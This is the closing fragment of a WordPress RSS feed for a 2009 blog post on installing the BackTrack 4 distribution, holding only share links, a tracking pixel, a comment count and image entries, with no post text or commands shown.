<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/bughira.wordpress.com/282/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/bughira.wordpress.com/282/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/bughira.wordpress.com/282/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/bughira.wordpress.com/282/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/bughira.wordpress.com/282/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/bughira.wordpress.com/282/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/bughira.wordpress.com/282/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/bughira.wordpress.com/282/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/bughira.wordpress.com/282/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/bughira.wordpress.com/282/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/bughira.wordpress.com/282/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/bughira.wordpress.com/282/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/bughira.wordpress.com/282/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/bughira.wordpress.com/282/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=bughira.wordpress.com&amp;blog=3478846&amp;post=282&amp;subd=bughira&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://bughira.wordpress.com/2009/03/10/bt4install-simplest-way-to-install-backtrack4/feed/</wfw:commentRss>
		<slash:comments>56</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/66d6f3751ae21240285913c9b962f9a4?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">bughira</media:title>
		</media:content>

		<media:content url="http://bughira.files.wordpress.com/2009/03/bt4.jpg" medium="image">
			<media:title type="html">bt4</media:title>
		</media:content>

		<media:content url="http://bughira.files.wordpress.com/2009/03/bt4_1.png" medium="image">
			<media:title type="html">bt4_1</media:title>
		</media:content>

		<media:content url="http://bughira.files.wordpress.com/2009/03/bt4_21.png" medium="image">
			<media:title type="html">bt4_21</media:title>
		</media:content>

		<media:content url="http://bughira.files.wordpress.com/2009/03/bt4_51.png" medium="image">
			<media:title type="html">bt4_51</media:title>
		</media:content>

		<media:content url="http://bughira.files.wordpress.com/2009/03/exp42.png" medium="image">
			<media:title type="html">exp42</media:title>
		</media:content>
	</item>
	</channel>
</rss>
